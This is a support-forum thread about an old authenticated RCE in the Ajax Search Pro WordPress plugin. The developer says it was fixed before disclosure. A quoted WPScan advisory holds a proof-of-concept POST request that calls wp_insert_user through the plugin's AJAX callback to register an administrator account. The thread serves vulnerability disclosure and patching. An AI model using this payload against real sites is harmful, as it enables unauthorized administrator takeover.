Authenticated RCE Vulnerability Logged Not Closed

This topic contains 3 replies, has 2 voices, and was last updated by Ernest Marcinko 6 years, 10 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)

Author
Posts
December 1, 2016 at 7:23 am #11068

OddenCreative
Participant
I would like to get a status update regarding this potential exploit… I just purchased this Plugin and was starting to configure when I got an alert about a potential exploit.
An Authentication RCE vulnerability was reported on this plugin
ajax-search-pro 4.9.8 – 0 more info
https://wpvulndb.com/plugins/ajax-search-pro
https://wpvulndb.com/vulnerabilities/7859
Ajax Search Pro – Authenticated RCE
Sign up to our free email alerts service for instant vulnerability notifications!
Description
Affected versions unknown.
Proof of Concept:
This will register an administrator with username “xADMIN” and password “xPASS”:
POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
Affects
Plugin ajax-search-pro
References
PACKETSTORM 130955
URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9
Classification
Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94
Miscellaneous
Submitter A. Samman
Submitter Twitter Evex_1337
Views 350
Verified No
WPVDB ID 7859
Timeline
Publicly Published 2015-03-18 (over 1 year ago)
Added 2015-03-21 (over 1 year ago)
Last Updated 2016-04-24 (7 months ago)
Copyright & License
Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.
December 1, 2016 at 8:36 am #11069

Ernest Marcinko
Keymaster
Hi,
It has been fixed a very long time ago, they messaged me before publishing the report so a fix was released before that.
Best,
Ernest Marcinko
If you like my products, don't forget to rate them on codecanyon :)

December 1, 2016 at 7:30 pm #11086

OddenCreative
Participant
Perhaps you can submit a note back to them so that they can mark it fixed, and close it. I know that if the next developer/admin comes along to check logs and sees that flagged, they will likely contact you, too.
We run clean green on our servers. A vulnerability or exploit mark is typically grounds for removal, or we look to help fix them.
Thanks for replying so quickly!
December 1, 2016 at 7:41 pm #11088

Ernest Marcinko
Keymaster
Hi!
I’ve sent a message again, and they already marked it as resolved 🙂
Thanks for notfying me, I thought this was done a long time ago.
Best,
Ernest Marcinko
If you like my products, don't forget to rate them on codecanyon :)
Author
Posts

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.